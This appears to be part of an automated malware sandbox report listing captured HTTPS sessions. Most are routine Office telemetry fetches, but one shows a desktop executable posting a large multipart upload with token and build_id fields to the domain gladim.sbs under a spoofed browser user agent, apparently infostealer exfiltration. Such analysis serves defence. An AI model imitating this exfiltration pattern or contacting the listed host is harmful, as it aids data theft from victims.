                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:50 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      126192.168.2.104989413.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:48 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 2284
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                                      x-ms-request-id: ab0c55e0-101e-00a2-20a2-429f2e000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213848Z-174f7845968px8v7hC1EWR08ng000000126000000000h5hp
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      127192.168.2.104989613.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:49 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 1393
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                                                      x-ms-request-id: 5ef45d95-201e-005d-64f2-41afb3000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213849Z-174f7845968qj8jrhC1EWRh41s00000011v000000000kgbw
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:49 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      128192.168.2.104989713.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:49 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 1356
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                                                      x-ms-request-id: 4455d6fa-e01e-0052-2ea9-42d9df000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213849Z-174f784596886s2bhC1EWR743w00000011yg00000000ghk7
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:49 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      129192.168.2.104989813.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:49 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:49 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 1393
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                                                      x-ms-request-id: fe0e881e-601e-0050-1a3a-402c9c000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213849Z-174f7845968vqt9xhC1EWRgten00000012300000000058m7
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:49 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      130192.168.2.104989913.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:49 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:49 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 1356
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                                                      x-ms-request-id: edbee89c-c01e-00a2-7069-402327000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213849Z-174f7845968frfdmhC1EWRxxbw0000001230000000005que
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:49 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      131192.168.2.104990694.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:50 UTC320OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----GDBKJDGIJECFIEBFIDHC
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 131557
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:50 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: ------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="token"851da9aea80a7835ade317d7fe8aca55------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------GDBKJDGIJECFIEBFIDHCCont
                                                                                                                                                                                                                                                      2024-11-30 21:38:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
